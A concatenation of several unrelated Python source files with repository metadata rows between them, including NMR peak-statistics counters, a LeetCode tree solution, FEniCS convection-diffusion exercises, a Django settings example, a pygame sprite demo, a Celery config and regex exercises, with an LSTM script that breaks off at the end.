class CompoundCounter(PeakCounter,FileNameCounter):
  """Counter composed of sub-counters; a peak is counted here once if any
  sub-counter applies to it."""
  def __init__(self,indent,name):
    PeakCounter.__init__(self,indent)
    FileNameCounter.__init__(self,indent)
    self._reasons=[]
    self._name=name
  def append( self, counter ):
    # Sub-counters report two columns deeper than this group line.
    counter.set_indent(self.get_indent()+2)
    self._reasons.append( counter )
  def count_peak(self,p):
    # Offer the peak to every sub-counter; count it here if any applied.
    applied=False
    for r in self._reasons:
      applied=r.count_peak(p) or applied
    if applied:
      FileNameCounter.count_peak(self,p)
    return applied
  def __str__(self):
    # Group total line followed by one line per sub-counter.
    s=''
    ct=0
    for r in self._reasons:
      ct+=r.count()
    s+=self.str_indented(self._name)
    s+='%8d'%ct
    s+=FileNameCounter.__str__(self)
    for r in self._reasons:
      s+='\n%s'%r
    return s
class UnassignedPeaks(CompoundCounter):
  """Groups all the reasons why a peak can end up unassigned."""
  def __init__(self,indent):
    CompoundCounter.__init__(self,indent,'unassigned')
class PickedCounter(SimplePeakCounter):
  """Counts every peak unconditionally (the total of picked peaks)."""
  def __init__(self,indent):
    SimplePeakCounter.__init__(self,indent,'picked')
  def applies(self,p):
    # Every picked peak qualifies.
    return True
class ZeroIntensityCounter(SimplePeakCounter):
  """Counts peaks whose recorded volume is exactly zero."""
  def __init__(self,indent):
    SimplePeakCounter.__init__(self,indent,'zero intensity')
  def applies(self,p):
    return 0 == p.volume()
class AssignedCounter(SimplePeakCounter):
  """Counts peaks carrying at least one assignment and not eliminated."""
  def __init__(self,indent):
    SimplePeakCounter.__init__(self,indent,'assigned')
  def applies(self,p):
    if 'eliminated' in p.comment:
      return False
    return p.nassign()>0
class NoInitialAssignment(SimplePeakCounter):
  """Counts peaks for which no assignment possibility existed at all."""
  def __init__(self,indent=0):
    SimplePeakCounter.__init__(self,indent,'without assignment possibility')
  def applies(self,p):
    return not p.nassign()
class Eliminated(SimplePeakCounter):
  """Counts peaks whose comment marks them 'eliminated' for a given reason.

  why: substring looked for in the peak comment, e.g. 'Network' or 'DistViol'.
  """
  def __init__(self,why,indent=0):
    SimplePeakCounter.__init__(self,indent,'eliminated due to '+why)
    self._why=why
  def applies(self,p):
    # NOTE(review): `p.nassign()>=0` looks vacuous if nassign() is a count
    # (always >= 0) — possibly `>0` was intended; confirm before changing.
    return p.nassign()>=0 and 'eliminated' in p.comment and self._why in p.comment
class UniqueAssignments(SimplePeakCounter):
  """Counts non-eliminated peaks carrying exactly one assignment."""
  def __init__(self,indent):
    SimplePeakCounter.__init__(self,indent,'with unique assignment')
  def applies(self,p):
    if 'eliminated' in p.comment:
      return False
    return p.nassign()==1
class MultipleAssignments(SimplePeakCounter):
  """Counts non-eliminated peaks with five or more initial assignments."""
  def __init__(self,indent):
    SimplePeakCounter.__init__(self,indent,'with >=5 initial assignments')
  def applies(self,p):
    if 'eliminated' in p.comment:
      return False
    return p.nassign()>=5
class IntraResidueAssignments(SimplePeakCounter):
  """Counts peaks whose closest assignment is intra-residue (|i-j| == 0)."""
  def __init__(self,indent):
    SimplePeakCounter.__init__(self,indent,'with intraresidue assignment')
  def applies(self,peak):
    if 'eliminated' in peak.comment or peak.nassign()==0: return False
    # Smallest residue separation over all assignments, capped at 100.
    deltas=[abs(a.atom(1).resid()-a.atom(2).resid()) for a in peak]
    return min([100]+deltas)==0
class ShortRangeAssignments(SimplePeakCounter):
  """Counts peaks whose closest assignment is sequential (|i-j| == 1)."""
  def __init__(self,indent):
    SimplePeakCounter.__init__(self,indent,'with sequential assignment |i-j|=1')
  def applies(self,peak):
    if 'eliminated' in peak.comment or peak.nassign()==0: return False
    # Smallest residue separation over all assignments, capped at 100.
    deltas=[abs(a.atom(1).resid()-a.atom(2).resid()) for a in peak]
    return min([100]+deltas)==1
class MediumRangeAssignments(SimplePeakCounter):
  """Counts peaks whose closest assignment is medium-range (1 < |i-j| < 5)."""
  def __init__(self,indent):
    SimplePeakCounter.__init__(self,indent,'with medium-range assignment 1<|i-j|<5')
  def applies(self,peak):
    if 'eliminated' in peak.comment or peak.nassign()==0: return False
    # Smallest residue separation over all assignments, capped at 100.
    deltas=[abs(a.atom(1).resid()-a.atom(2).resid()) for a in peak]
    closest=min([100]+deltas)
    return closest > 1 and closest < 5
class LongRangeAssignments(SimplePeakCounter):
  """Counts peaks whose closest assignment is long-range (|i-j| >= 5)."""
  def __init__(self,indent):
    SimplePeakCounter.__init__(self,indent,'with long-range assignment |i-j|>=5')
  def applies(self,peak):
    if 'eliminated' in peak.comment or peak.nassign()==0: return False
    # Smallest residue separation over all assignments, capped at 100.
    deltas=[abs(a.atom(1).resid()-a.atom(2).resid()) for a in peak]
    return min([100]+deltas) >= 5
class ViolationCounter(SimplePeakCounter):
  """Counts peaks whose distance violation falls in [lo, hi) Angstrom.

  The violation magnitude is parsed from the peak comment, which is
  expected to contain 'DistViol' followed by '>' and a value ending in
  'A' (e.g. 'DistViol >1.2A'). hi=None means no upper bound.
  """
  def __init__(self,lo,hi=None,indent=0):
    if not hi:
      msg='above %3.1f A'%lo;
    else:
      msg='between %3.1f and %3.1f A'%(lo,hi);
    SimplePeakCounter.__init__(self,indent,msg)
    self._cutoff=lo
    self._ignore=hi
  def applies(self,p):
    if p.nassign()==0: return False
    start=p.comment.find('DistViol')
    if start<0: return False
    # Locate the numeric violation between '>' and the trailing 'A'.
    start=p.comment.find('>',start)
    end=p.comment.find('A',start+1)
    if start<0: return False
    viol=float(p.comment[start+1:end])
    return 'DistViol' in p.comment and viol >= self._cutoff and (not self._ignore or viol < self._ignore)
class AllViolationCounter(CompoundCounter):
  """Histogram of distance-violation magnitudes for eliminated peaks."""
  def __init__(self,indent):
    CompoundCounter.__init__(self,indent,'eliminated due to violations (DistViol)...')
    # Buckets: [0,0.5), [0.5,2), [2,5), [5,inf).
    for lo, hi in ((0, 0.5), (0.5, 2), (2, 5), (5, None)):
      self.append( ViolationCounter(lo, hi) )
# ---- Assemble and print the peak / assignment statistics report ----
# Counters applied to every peak before the volume-contribution filter.
initial_peak_stats=[]
# Counters applied after the filter.
peak_stats=[]
indent=2
peak_stats.append(PickedCounter(indent))
peak_stats.append(ZeroIntensityCounter(indent))
peak_stats.append(AssignedCounter(indent))
initial_peak_stats.append(MultipleAssignments(indent))
# Group all the reasons why a peak can end up unassigned.
unassigned_counter=UnassignedPeaks(indent)
unassigned_counter.append( NoInitialAssignment() )
unassigned_counter.append( Eliminated('Network') )
unassigned_counter.append( Eliminated('MinPeakVol') )
unassigned_counter.append( Eliminated('DistViol') )
unassigned_counter.append( Eliminated('MaxAssign') )
peak_stats.append( unassigned_counter )
# Per-assignment statistics: range classes and the violation histogram.
assign_stats=[]
assign_stats.append( UniqueAssignments(indent) )
assign_stats.append( IntraResidueAssignments(indent) )
assign_stats.append( ShortRangeAssignments(indent) )
assign_stats.append( MediumRangeAssignments(indent) )
assign_stats.append( LongRangeAssignments(indent) )
assign_stats.append( AllViolationCounter(indent) )
crosspeaks=noesy.read_peak_files(args.peaks)
import itertools
for peak in crosspeaks:
  for stat in initial_peak_stats:
    stat.count_peak(peak)
  # Drop assignments whose volume contribution is below -min_vc
  # before running the post-filter counters.
  if args.min_vc and args.min_vc>0:
    op=copy.copy(peak)
    peak.clear_assignments()
    for a in op:
      vc = a.volume_contribution()
      if vc < args.min_vc:
        continue
      peak.add_assignment(a)
  for stat in itertools.chain(peak_stats,assign_stats):
    stat.count_peak(peak)
# Emit the report (Python 2 print statements).
print 'Peaks:'
for stat in itertools.chain(peak_stats,initial_peak_stats):
  print stat
print 'Assignments:'
for stat in assign_stats:
  print stat
|
[
"zaiyong@jianings-MacBook-Air.local"
] |
zaiyong@jianings-MacBook-Air.local
|
|
cdd317914e0c97fedd74e5edd3234da9f79bb229
|
dc025df4a433b82c96fa7a4e064f46ecc948d1a2
|
/binary_tree_right_side_view.py
|
eea8357910654bf349af38a2f8072bfe778cc925
|
[] |
no_license
|
bingh0616/algorithms
|
c9d3babd6cbf3aefd40fa28a3c839c7201f1028c
|
3b16c72d9361c4bb063e4b2789db695f1e0149bf
|
refs/heads/master
| 2021-01-18T14:10:45.125905
| 2015-11-19T06:03:48
| 2015-11-19T06:03:48
| 35,512,148
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 844
|
py
|
# problem description: https://leetcode.com/problems/binary-tree-right-side-view/
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    # @param {TreeNode} root
    # @return {integer[]}
    def rightSideView(self, root):
        """Return the node values visible from the right, top to bottom.

        Level-order (BFS) traversal: the last node dequeued on each level
        is the rightmost one, so its value is recorded once per level.

        Fix: the original used `collections.deque` without importing
        `collections` anywhere in the file (NameError at runtime).
        """
        import collections  # local import: the file never imported collections
        if not root:
            return []
        view = []
        queue = collections.deque([root])
        while queue:
            # Drain exactly one level; `node` ends as the rightmost node.
            for _ in range(len(queue)):
                node = queue.popleft()
                if node.left:
                    queue.append(node.left)
                if node.right:
                    queue.append(node.right)
            view.append(node.val)
        return view
|
[
"bingh0616@gmail.com"
] |
bingh0616@gmail.com
|
70f25dc75dafc450b9bbde6a2976aa94936cb471
|
5b9420eb9cb1578c4baeee313e78c07a87e9e27c
|
/mandatory1/code/ex2.py
|
50b70026cbb04e6e1bae2c6b03e1a7716699caf9
|
[] |
no_license
|
christian-pedersen/mek4250
|
d612b803ee39c6dfe44d109bd7750165c12b39ad
|
afff12221e3f29e2b5e5d0f4789283167b293d69
|
refs/heads/master
| 2023-03-15T12:17:24.663547
| 2016-07-10T06:21:05
| 2016-07-10T06:21:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,554
|
py
|
# Mandatory assignment 1
# exercise 2
from dolfin import *
import numpy as np
import matplotlib.pyplot as plt
set_log_active(False)
def BC(mesh, V):
    """Return Dirichlet BCs for the unit square: u=0 at x=0, u=1 at x=1.

    All four edges are marked in a facet function (left=1, right=2,
    bottom=3, top=4), but only the left/right sides receive Dirichlet
    values; top and bottom are left to the natural (Neumann) condition.
    """
    mf = FacetFunction("size_t", mesh)
    mf.set_all(0)
    class Left(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[0], 0) and on_boundary
    class Right(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[0], 1) and on_boundary
    class Bottom(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[1], 0) and on_boundary
    class Top(SubDomain):
        def inside(self, x, on_boundary):
            return near(x[1], 1) and on_boundary
    left = Left()
    left.mark(mf, 1)
    right = Right()
    right.mark(mf, 2)
    bottom = Bottom()
    bottom.mark(mf, 3)
    top = Top()
    top.mark(mf, 4)
    #plot(mf,interactive=True)
    leftBC = DirichletBC(V, Constant(0), mf, 1)
    rightBC = DirichletBC(V, Constant(1), mf, 2)
    BCs = [leftBC, rightBC]
    return BCs
def numerical(mu, n, deg):
    """Galerkin solve of the convection-diffusion problem on the unit square.

    Weak form: mu*(grad u, grad v) + (u_x, v) = 0 with BCs from BC().
    n is the number of cells per direction, deg the CG polynomial degree.
    Returns (solution, function space, mesh).
    """
    mesh = UnitSquareMesh(n, n)
    V = FunctionSpace(mesh, 'CG', deg)
    BCs = BC(mesh, V)
    u = TrialFunction(V)
    v = TestFunction(V)
    eq = mu*inner(grad(u), grad(v))*dx + u.dx(0)*v*dx
    u_ = Function(V)
    solve(lhs(eq) == rhs(eq), u_, BCs)
    return u_, V, mesh
def exact(mu):#, n, deg):
    """Return the analytic solution u(x) = (e^{x/mu} - 1)/(e^{1/mu} - 1).

    The problem is effectively one-dimensional, so the exact solution
    depends only on x[0]. Returned as an un-interpolated Expression.
    """
    #mesh = UnitSquareMesh(n, n)
    #V = FunctionSpace(mesh, 'CG', deg)
    #BCs = BC(mesh, V)
    exact = Expression('(exp(x[0]/mu) - 1) / (exp(1/mu) - 1)', mu=mu)
    #u = interpolate(exact, V)
    return exact
def task_b():
    """Tabulate L2 errors and convergence rates for the plain Galerkin solve.

    For each mu, the solution on successively refined meshes is compared
    against the exact solution interpolated into a degree+2 space.
    """
    mu = [1, 0.1, 0.01, 0.002]
    N = [8, 16, 32, 64]
    deg = 1
    error = np.zeros([len(mu),len(N)])
    for m in range(len(mu)):
        rate = np.zeros(len(N)-1)
        for n in range(len(N)):
            un, V, mesh = numerical(mu[m], N[n], deg)
            ue = exact(mu[m])
            # interpolate the exact solution into a richer space so the
            # interpolation error does not pollute the error norm
            V2 = FunctionSpace(mesh, 'CG', deg+2)
            ue = interpolate(ue, V2)
            error[m, n] = errornorm(ue, un)
            if n > 0:
                # NOTE(review): N[n]/N[n-1] is integer division under
                # Python 2, but the ratios here are exact (always 2).
                rate[n-1] = -np.log(error[m,n]/error[m,n-1]) / np.log(N[n]/N[n-1])
        #plotname = 'u_numerical_mu'+str(m)
        #wiz = plot(un, interactive=False)
        #wiz.write_png(plotname)
        print rate
    print error
def task_c():
    """Least-squares fit log(error) = log(C) + alpha*log(h).

    For each norm (L2, H1), degree and mu, errors on a mesh sequence are
    fitted by solving the 2x2 normal equations, yielding the observed
    convergence rate alpha and constant C.
    """
    for normdeg in [1, 2]:
        if normdeg == 1:
            print 'Error norm L2'
        else:
            print 'Error norm H1'
        for deg in [1, 2]:
            print 'Polynomial order:',deg
            for mu in [1, 0.1, 0.01, 0.002]:
                N = [4, 8, 16, 32, 64, 128]
                a = np.zeros(len(N))
                y = np.zeros(len(N))
                for n in range(len(N)):
                    u_num, V, mesh = numerical(mu, N[n], deg)
                    # richer space for the exact solution (see task_b)
                    V2 = FunctionSpace(mesh, 'CG', deg+2)
                    u_ex = exact(mu)
                    u_ex = interpolate(u_ex, V2)
                    #plot(u_ex)
                    #plot(u_num)
                    #interactive()
                    if normdeg == 1:
                        A = errornorm(u_ex, u_num, 'l2')
                        #B = 0.5*((-k*np.pi)**2 + (-l*pi)**2)
                        #B = norm(u_ex, 'h1')
                    else:
                        A = errornorm(u_ex, u_num, 'h1')
                        #B = 0
                        #for i in range(normdeg):
                        #    B += ((k*np.pi)**2 + (l*np.pi)**2)**i
                    y[n] = np.log(A)#/B)
                    a[n] = np.log(mesh.hmin())#np.log(1./(N[n]))
                #plt.plot(a, y, 'o', label='points')
                # solve system Ax = b  (normal equations of the 1D fit)
                Am = np.zeros([2, 2])
                b = np.zeros(2)
                Am[0, 0] = len(N)
                for i in range(len(N)):
                    Am[0, 1] += a[i]
                    Am[1, 0] += a[i]
                    Am[1, 1] += a[i]**2
                    b[0] += y[i]
                    b[1] += a[i]*y[i]
                logC, alfa = np.linalg.solve(Am, b)
                #print 'Polynomial order:',deg
                print 'mu:',mu
                print 'alpha:',alfa, ', C:',np.exp(logC)
                f = lambda x: logC + alfa*x
                x = np.linspace(a[0], a[-1], 101)
                #plt.plot(x, f(x), label='lsq approximation')
                #plt.legend(loc='upper left')
                #plt.grid('on')
                #plt.xlabel('log(h)'), plt.ylabel('log(||u - uh||)')
                #plt.savefig('lsq_normdeg' +str(normdeg)+ '_polydeg' +str(deg)+ '_mu' +str(mu)+ '.png')
                #plt.show()
def SUPG(mu, n, deg):
    """Solve the convection-diffusion problem with SUPG stabilisation.

    The test function is augmented with beta*v_x (beta = h_min/2), which
    adds streamline diffusion and damps the oscillations of the plain
    Galerkin method when mu is small (convection-dominated regime).
    Returns (solution, mesh, function space).
    """
    mesh = UnitSquareMesh(n, n)
    V = FunctionSpace(mesh, 'CG', deg)
    BCs = BC(mesh, V)
    u = TrialFunction(V)
    v = TestFunction(V)
    beta = 0.5*mesh.hmin()
    v = v + beta*v.dx(0)
    eq = mu*inner(grad(u), grad(v))*dx + u.dx(0)*v*dx
    u_ = Function(V)
    solve(lhs(eq) == rhs(eq), u_, BCs)
    #plot(u_, interactive=True)
    return u_, mesh, V
def task_d():
    """Report L2/H1 errors and convergence rates for the SUPG solver."""
    # numerical error
    for deg in [1]:
        print ''
        print 'Polynomial degree:',deg
        print '------------------------'
        for mu in [1.0, 0.1, 0.01, 0.002]:
            print ''
            print 'mu:', mu
            N = [8, 16, 32, 64]
            errorL2 = np.zeros(len(N))
            errorH1 = np.zeros(len(N))
            rateL2 = np.zeros(len(N)-1)
            rateH1 = np.zeros(len(N)-1)
            for n in range(len(N)):
                unum, mesh, V = SUPG(mu, N[n], deg)
                # richer space for the exact solution (see task_b)
                V2 = FunctionSpace(mesh, 'CG', deg+2)
                uex = exact(mu)
                uex = interpolate(uex, V2)
                errorL2[n] = errornorm(uex, unum)
                errorH1[n] = errornorm(uex, unum, 'h1')
                if n == 0:
                    print 'N:',N[n],', L2 error:', errorL2[n], ', H1 error:',errorH1[n]
                    #plot(unum, interactive=True)
                elif n > 0:
                    print 'N:',N[n],', L2 error:', errorL2[n], ', H1 error:',errorH1[n]
                    rateL2[n-1] = -np.log(errorL2[n]/errorL2[n-1]) / np.log(N[n]/N[n-1])
                    rateH1[n-1] = -np.log(errorH1[n]/errorH1[n-1]) / np.log(N[n]/N[n-1])
                #plotname = '1D_deg_'+str(deg)+'_mu'+str(n)
                #wiz = plot(unum, interactive=False)
                #wiz.write_png(plotname)
            print 'L2 convergence rate:', rateL2
            print 'H1 convergence rate:', rateH1
#task_b()
#task_c()
#task_d()
#SUPG(0.002, 16, 1)
|
[
"christian_pedersen21@hotmail.com"
] |
christian_pedersen21@hotmail.com
|
c47001c1ab51e1ae3d183da4d7f294b8b89d784c
|
0545e8fe5a602f75a2ea150d0178c8db5a3c59d6
|
/go/settings.example.py
|
6e9f629635fd52e090ccd701536101e04b672e71
|
[] |
no_license
|
forgeries/go
|
c52849ace8d9df7d00254ecf8b4b1cb974bff0cb
|
44255a0dcf768415efd685340e26a7693dae4f8d
|
refs/heads/master
| 2021-09-15T04:40:11.476468
| 2018-05-26T07:23:48
| 2018-05-26T07:23:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,243
|
py
|
"""
Django settings for go project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# os.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'login',
'captcha',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'go.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR,'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'go.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'go',
'HOST': 'localhost',
'USER': 'xxx',
'PASSWORD': 'xxx',
'PORT':'3306'
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
# LANGUAGE_CODE = 'en-us'
#
# TIME_ZONE = 'UTC'
#
# USE_I18N = True
#
# USE_L10N = True
#
# USE_TZ = True
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.163.com'
EMAIL_PORT = 25
EMAIL_HOST_USER = 'xxx@163.com'
EMAIL_HOST_PASSWORD = 'xxx'
EMAIL_FROM = '花生宝贝<xxx@163.com>'
CONFIRM_DAYS = 7
|
[
"552388264@qq.com"
] |
552388264@qq.com
|
ac5e85e8b73484f3000a082e60602809d0f23ad9
|
663d5dc88b1b07599fd79665c45cf2831bdcf47f
|
/sol/solution (4)/main.py
|
e545ca81d9bf75e26b7e1e7cbf8ea1b4d486c1fd
|
[] |
no_license
|
l-arkadiy-l/some-examples
|
c5392ba1cf5cf6afbf8f887a39c8be3801595edc
|
616813129177724b12a910d8abe65119b085a8a1
|
refs/heads/main
| 2023-02-01T21:16:34.235364
| 2020-12-18T15:10:46
| 2020-12-18T15:10:46
| 322,626,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,705
|
py
|
import random
import pygame
class Boom(pygame.sprite.Sprite):
    """Clickable bomb sprite: swaps to an explosion image when clicked."""
    def __init__(self, pos, image, *group):
        # image: filename inside the 'data' directory; group: sprite groups
        super(Boom, self).__init__(*group)
        self.image = pygame.image.load('data/{}'.format(image))
        # self.image.fill(pygame.Color('red'))
        self.pos = pygame.Vector2(pos)
        self.rect = self.image.get_rect()
        print(self.rect.width)  # debug output of the sprite width
        self.image_boom = pygame.image.load('data/boom.png')
    def update(self, *args):
        """On a mouse-down inside this sprite's rect, switch to the boom image."""
        if args and args[0].type == pygame.MOUSEBUTTONDOWN and \
                self.rect.collidepoint(args[0].pos):
            self.image = self.image_boom
# Main loop: scatter 20 bombs at random positions, then run the event loop
# at 60 FPS until the window is closed.
pygame.init()
pygame.display.set_caption("Hero is moving!")
SIZE = WIDTH, HEIGHT = (500, 500)
screen = pygame.display.set_mode(SIZE)
all_sprites = pygame.sprite.Group()
for i in range(20):
    # sprites could also be created with the group passed directly
    bomb = Boom((0, 0), 'bomb.png')
    # place the bomb at a random position inside the window
    bomb.rect.x = random.randrange(WIDTH - bomb.rect.width)
    bomb.rect.y = random.randrange(HEIGHT - bomb.rect.height)
    all_sprites.add(bomb)
running = True
flipping = False
Clock = pygame.time.Clock()
while running:
    for event in pygame.event.get():
        # window close event
        if event.type == pygame.QUIT:
            running = False
        all_sprites.update(event)
    screen.fill(pygame.Color('black'))
    all_sprites.draw(screen)
    # screen.fill(pygame.Color('white'))
    # screen.blit(bomb.image, (bomb.pos[0], bomb.pos[-1]))
    pygame.display.flip()
    Clock.tick(60)
|
[
"noreply@github.com"
] |
l-arkadiy-l.noreply@github.com
|
6733e5adc71aa5c82d018f128009f8ac5f45c9e7
|
df5184a4581cece37e8cde2a3ae647211e4b4d21
|
/src/config/celery.py
|
08783a9ac8394849083f94b3228c956c167c160b
|
[] |
no_license
|
miloszsobiczewski/Beholder
|
e2fa920d0233abb103ac406f709267cf754dd61d
|
cb523e928c91b7ee44fa201e0118477e61129305
|
refs/heads/master
| 2022-02-09T20:46:45.000558
| 2021-07-26T20:00:40
| 2021-07-26T20:00:40
| 240,501,693
| 0
| 0
| null | 2022-01-06T22:41:32
| 2020-02-14T12:19:04
|
Python
|
UTF-8
|
Python
| false
| false
| 565
|
py
|
import os
from celery import Celery
# set the default Django settings module for the 'celery' program.
# (must happen before the Celery app is instantiated below)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings")
app = Celery("config")
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
#   should have a `CELERY_` prefix.
app.config_from_object("django.conf:settings", namespace="CELERY")
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
|
[
"sobiczewski.milosz@gmail.com"
] |
sobiczewski.milosz@gmail.com
|
e8e79a0ba665cfd8c009197b6ba367bd8c058fed
|
3a74764c3fc38f87cd2ed0ba9e96b23ad9a0677e
|
/bite_69/bite_69.py
|
fd3d78955afe129be34c1d79adc8d0c38e260367
|
[] |
no_license
|
nalwayv/bitesofpy
|
7dbc7cb55c9bc3c111f67243759cf56a2b785f51
|
56b0f7f85fd4b18d11a1b5df8da0a95e5ba2dcaa
|
refs/heads/master
| 2023-05-26T05:46:06.859108
| 2020-02-05T00:02:35
| 2020-02-05T00:02:35
| 216,651,358
| 2
| 0
| null | 2023-05-22T22:43:16
| 2019-10-21T19:41:25
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,840
|
py
|
"""
Bite 69. Regex Fun - part II
"""
import re
from typing import List
def has_timestamp(text: str) -> bool:
    """Return True if text contains a timestamp of this format:
    2014-07-03T23:30:37"""
    # Spell out every field instead of the loose '[0-9A-Z]+' the original
    # used for the day+'T'+hour span: 4-digit year, 2-digit month/day,
    # a literal 'T', then HH:MM:SS.
    return re.search(r'\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}', text) is not None
def is_integer(number: int) -> bool:
    """Return True if number's string form is an (optionally negative) integer."""
    match = re.search(r'^-?[0-9]+$', str(number))
    return match is not None
def has_word_with_dashes(text: str) -> bool:
    """Returns True if text has one or more words with dashes"""
    # A dash counts only when flanked by word characters on both sides.
    return bool(re.search(r'\w+-\w+', text))
def remove_all_parenthesis_words(text: str) -> str:
    """Return text but without any words or phrases in parenthesis:
    'Good morning (afternoon)' -> 'Good morning' (so don't forget
    leading spaces).

    Each '(...)' group is removed together with the whitespace before it
    in a single substitution. The original substituted a '~' placeholder
    and then stripped ' ~', leaving stray '~' characters whenever a
    group was not preceded by a space.
    """
    return re.sub(r'\s*\([^)]*\)', '', text)
def split_string_on_punctuation(text: str) -> List[str]:
    """Split on ?!.,; - e.g. "hi, how are you doing? blabla" ->
    ['hi', 'how are you doing', 'blabla']
    (make sure you strip trailing spaces)"""
    parts = []
    for chunk in re.split(r'[!\"#$%&\'()*+,-.\/:;<=>?@\[\\\]^_`{|}~]', text):
        # drop empty pieces BEFORE stripping, matching the original quirk
        if chunk:
            parts.append(chunk.strip())
    return parts
def remove_duplicate_spacing(text: str) -> str:
    """Replace each run of whitespace by a single space."""
    return re.sub(r'\s+', ' ', text)
def has_three_consecutive_vowels(word: str) -> bool:
    """Returns True if word has at least 3 consecutive vowels"""
    return bool(re.search(r'[aeiou]{3,}', word))
def convert_emea_date_to_amer_date(date: str) -> str:
    """Convert dd/mm/yyyy (EMEA date format) to mm/dd/yyyy
    (AMER date format); return 'none' if no date is found."""
    match = re.search(r'(\d.*?)/(\d.*?)/(\d{4})', date)
    if match is None:
        return 'none'
    day, month, year = match.groups()
    return '{}/{}/{}'.format(month, day, year)
if __name__ == "__main__":
print(f"- STAMP {'-'*45}")
print(has_timestamp('INFO 2014-07-03T23:27:51 Shutdown initiated.'))
print(has_timestamp('INFO 2014-06-01T13:28:51 Shutdown initiated.'))
print(has_timestamp('INFO 2014-7-3T23:27:51 Shutdown initiated.'))
print(has_timestamp('INFO 2014-07-03t23:27:1 Shutdown initiated.'))
print(f"- INT {'-'*45}")
print(is_integer(1))
print(is_integer(-1))
print(is_integer('str'))
print(is_integer(1.1))
print(f"- DASHES {'-'*45}")
print(has_word_with_dashes('this Bite is self-contained'))
print(has_word_with_dashes('the match ended in 1-1'))
print(has_word_with_dashes('this Bite is not selfcontained'))
print(has_word_with_dashes('the match ended in 1- 1'))
print(f"- REPLACE {'-'*45}")
for a, b in [('good morning (afternoon), how are you?',
'good morning, how are you?')]:
print(remove_all_parenthesis_words(a) == b)
for a, b in [('math (8.6) and science (9.1) where his strengths',
'math and science where his strengths')]:
print(remove_all_parenthesis_words(a) == b)
print(f"- SPLIT {'-'*45}")
print(split_string_on_punctuation('hi, how are you doing? blabla'))
print(
split_string_on_punctuation(';String. with. punctuation characters!'))
print(f"- DUPLICATE SPACEING {'-'*45}")
print(
remove_duplicate_spacing(
'This is a string with too much spacing'))
print(f"- 3 VOWELS {'-'*45}")
for word in ['beautiful', 'queueing', 'mountain', 'house']:
print(has_three_consecutive_vowels(word))
print(f"- DATE {'-'*45}")
print(convert_emea_date_to_amer_date('31/03/2018'))
print(convert_emea_date_to_amer_date('none'))
|
[
"nalwayv@googlemail.com"
] |
nalwayv@googlemail.com
|
9a94c24fa6adb96b19038922aa59abc025baf07d
|
201c3db3d299acf32ac8e44f7d93d9f48aeb4708
|
/lstm2.py
|
7b5751b60b75eb5590b611713e7d7e15c8917133
|
[] |
no_license
|
PKUSZ-PR/LastWorkofPR
|
a31d4e7d9d9512498b2bd1fc7e45657d1a7da1fa
|
eea41366647c345666046025d4e43d3f9b151dfe
|
refs/heads/master
| 2021-05-14T14:59:58.525460
| 2018-01-03T11:03:21
| 2018-01-03T11:03:21
| 115,981,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,730
|
py
|
# -*- coding:utf-8 -*-
from __future__ import print_function, division
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import random
import os
import struct
import util
'''
This is the first version to use lstm and crf to sovle ner problem
'''
#-------------------------function definition-----------------------
def cal_accurency(lb, logit):
    """Count label/prediction agreement over non-padding positions.

    lb and logit are parallel sequences of int-castable class ids; a
    label of 0 is treated as padding and skipped.

